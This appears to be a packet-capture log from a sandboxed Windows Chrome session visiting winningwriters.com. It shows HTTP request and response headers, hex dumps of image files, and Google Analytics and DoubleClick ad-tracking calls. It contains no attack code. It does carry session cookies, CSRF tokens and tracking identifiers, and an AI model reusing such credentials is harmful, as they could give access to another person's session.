                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga=GA1.1.723902191.1731960008; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960013.55.0.0
                                                                                                                                                                                            2024-11-18 20:00:17 UTC368INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:17 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "3eb-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 1003
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:17 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:17 UTC1003INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0a 00 00 00 0a 08 06 00 00 00 8d 32 cf bd 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 66 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 33 2d 63 30 31 31 20 36 36 2e 31 34 35 36 36 31 2c 20 32 30 31 32 2f 30 32 2f 30 36 2d 31 34 3a 35 36 3a 32 37 20 20
                                                                                                                                                                                            Data Ascii: PNGIHDR2tEXtSoftwareAdobe ImageReadyqe<fiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            126192.168.2.164986266.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:18 UTC945OUTGET /assets/images/winningwriters.ico HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga=GA1.1.723902191.1731960008; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960013.55.0.0; wwpopup=popupseen
                                                                                                                                                                                            2024-11-18 20:00:18 UTC369INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:18 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 24 Oct 2018 18:10:40 GMT
                                                                                                                                                                                            ETag: "57e-578fd6760a800"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 1406
                                                                                                                                                                                            Cache-Control: max-age=29030400, public
                                                                                                                                                                                            Expires: Wed, 20 Nov 2024 20:00:18 GMT
                                                                                                                                                                                            Vary: User-Agent
                                                                                                                                                                                            Content-Type: image/vnd.microsoft.icon
                                                                                                                                                                                            2024-11-18 20:00:18 UTC1406INData Raw: 00 00 01 00 01 00 10 10 00 00 00 00 00 00 68 05 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 08 00 00 00 00 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 3b 63 da 00 9e b2 eb 00 01 31 cc 00 6c 8b e0 00 cd d6 f7 00 1b 4b d3 00 e7 ea f9 00 85 9c e7 00 53 76 de 00 b3 c3 f1 00 2c 55 d4 00 0d 3f cf 00 5f 7f e0 00 d9 df f6 00 48 6d db 00 ee f3 fc 00 7b 96 e6 00 bd c9 f1 00 96 aa eb 00 ab bd ec 00 25 4e d3 00 08 37 ce 00 8d a0 e9 00 34 5f d6 00 df e3 fb 00 15 41 d2 00 42 67 d9 00 5a 78 e1 00 66 82 e1 00 4d 72 da 00 31 59 d7 00 fa fb ff 00 d4 db f6 00 26 55 d5 00 20 4c d5 00 9c ad ec 00 ae c1 ee 00 96 ac e6 00 51 70 dd 00 87 a1 e7 00 62 84 de 00 ca d3 f4 00 67 87 e0 00 16 45 cf 00 3d 65 d6 00 5c 7b de 00 82
                                                                                                                                                                                            Data Ascii: h( @;c1lKSv,U?_Hm{%N74_ABgZxfMr1Y&U LQpbgE=e\{


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            127192.168.2.164986366.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:18 UTC948OUTGET /assets/fancybox/fancybox_sprite.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga=GA1.1.723902191.1731960008; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960013.55.0.0; wwpopup=popupseen
                                                                                                                                                                                            2024-11-18 20:00:18 UTC368INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:18 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "552-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:18 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:18 UTC1362INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2c 00 00 00 98 08 03 00 00 00 a8 01 fb 50 00 00 00 bd 50 4c 54 45 00 00 00 00 00 00 00 00 00 0e 0e 0e 00 00 00 00 00 00 00 00 00 cd cd cd 01 01 01 d9 d9 d9 03 03 03 07 07 07 00 00 00 df df df 02 02 02 3f 3f 3f 01 01 01 00 00 00 82 82 82 1c 1c 1c e5 e5 e5 00 00 00 bf bf bf f1 f1 f1 06 06 06 67 67 67 00 00 00 ec ec ec 06 06 06 f8 f8 f8 3f 3f 3f c9 c9 c9 9e 9e 9e 67 67 67 f7 f7 f7 83 83 83 00 00 00 d0 d0 d0 f8 f8 f8 ae ae ae da da da fc fc fc ec ec ec 00 00 00 f9 f9 f9 fd fd fd de de de 00 00 00 ff ff ff 4e 4e 4e c1 c1 c1 35 35 35 ac ac ac 8d 8d 8d 9c 9c 9c 7a 7a 7a 5d 5d 5d 68 68 68 2c 2c 2c ba ba ba 22 22 22 ce ce ce 41 41 41 6d dc f0 8d 00 00 00 2f 74 52 4e 53 00 01 03 08 0d 12 19 1d 23 27 2d 3a 44
                                                                                                                                                                                            Data Ascii: PNGIHDR,PPLTE???ggg???gggNNN555zzz]]]hhh,,,"""AAAm/tRNS#'-:D


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            128192.168.2.164986466.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:18 UTC949OUTGET /assets/fancybox/fancybox_overlay.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga=GA1.1.723902191.1731960008; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960013.55.0.0; wwpopup=popupseen
                                                                                                                                                                                            2024-11-18 20:00:18 UTC368INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:18 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "3eb-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 1003
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:18 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:18 UTC1003INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0a 00 00 00 0a 08 06 00 00 00 8d 32 cf bd 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 66 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 33 2d 63 30 31 31 20 36 36 2e 31 34 35 36 36 31 2c 20 32 30 31 32 2f 30 32 2f 30 36 2d 31 34 3a 35 36 3a 32 37 20 20
                                                                                                                                                                                            Data Ascii: PNGIHDR2tEXtSoftwareAdobe ImageReadyqe<fiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            129192.168.2.1649865216.239.34.1814436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:19 UTC1354OUTPOST /g/collect?v=2&tid=G-S2XE0RVPX9&gtm=45je4be0v889608727z8846709124za200zb846709124&_p=1731960005145&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067554~102067808~102077855~102081484&cid=723902191.1731960008&ul=en-us&sr=1280x1024&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&pae=1&frm=0&pscdl=noapi&_s=2&sid=1731960008&sct=1&seg=0&dl=https%3A%2F%2Fwinningwriters.com%2F&dt=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&en=slider_change&ep.event_category=Slider&ep.event_label=Ad-Top&ep.value=Wergle%20Flomp%20Humor%20Poetry%20Contest&_et=4715&tfd=19364 HTTP/1.1
                                                                                                                                                                                            Host: analytics.google.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Origin: https://winningwriters.com
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:19 UTC849INHTTP/1.1 204 No Content
                                                                                                                                                                                            Access-Control-Allow-Origin: https://winningwriters.com
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:19 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:136:0
                                                                                                                                                                                            Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting
                                                                                                                                                                                            Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:136:0"}],}
                                                                                                                                                                                            Server: Golfe2
                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            130192.168.2.1649867142.250.185.1304436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:23 UTC1571OUTGET /td/rul/1072733940?random=1731960022416&cv=11&fst=1731960022416&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top HTTP/1.1
                                                                                                                                                                                            Host: td.doubleclick.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                            Sec-Fetch-Dest: iframe
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
                                                                                                                                                                                            2024-11-18 20:00:24 UTC646INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:23 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            2024-11-18 20:00:24 UTC18INData Raw: 64 0d 0a 3c 68 74 6d 6c 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                            Data Ascii: d<html></html>
                                                                                                                                                                                            2024-11-18 20:00:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            131192.168.2.1649866142.250.186.1624436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:23 UTC1447OUTGET /pagead/viewthroughconversion/1072733940/?random=1731960022416&cv=11&fst=1731960022416&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1
                                                                                                                                                                                            Host: googleads.g.doubleclick.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
                                                                                                                                                                                            2024-11-18 20:00:24 UTC703INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:24 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            2024-11-18 20:00:24 UTC675INData Raw: 31 33 32 64 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 20 3d 20 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 29 7b 69 66 28 61 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 61 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 64 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 66 75 6e 63 74 69 6f 6e 20 6b 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c
                                                                                                                                                                                            Data Ascii: 132d(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&global
                                                                                                                                                                                            2024-11-18 20:00:24 UTC1378INData Raw: 72 20 63 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 61 3d 63 2e 6c 65 6e 67 74 68 3d 3d 3d 31 3b 76 61 72 20 65 3d 63 5b 30 5d 2c 67 3b 21 61 26 26 65 20 69 6e 20 74 3f 67 3d 74 3a 67 3d 6d 3b 66 6f 72 28 65 3d 30 3b 65 3c 63 2e 6c 65 6e 67 74 68 2d 31 3b 65 2b 2b 29 7b 76 61 72 20 66 3d 63 5b 65 5d 3b 69 66 28 21 28 66 20 69 6e 20 67 29 29 62 72 65 61 6b 20 61 3b 67 3d 67 5b 66 5d 7d 63 3d 63 5b 63 2e 6c 65 6e 67 74 68 2d 31 5d 3b 64 3d 70 26 26 64 3d 3d 3d 22 65 73 36 22 3f 67 5b 63 5d 3a 6e 75 6c 6c 3b 62 3d 62 28 64 29 3b 62 21 3d 6e 75 6c 6c 26 26 28 61 3f 68 28 74 2c 63 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 62 7d 29 3a 62 21 3d 3d 64 26 26 28 76 5b 63 5d 3d 3d 3d 76 6f 69 64 20 30
                                                                                                                                                                                            Data Ascii: r c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0
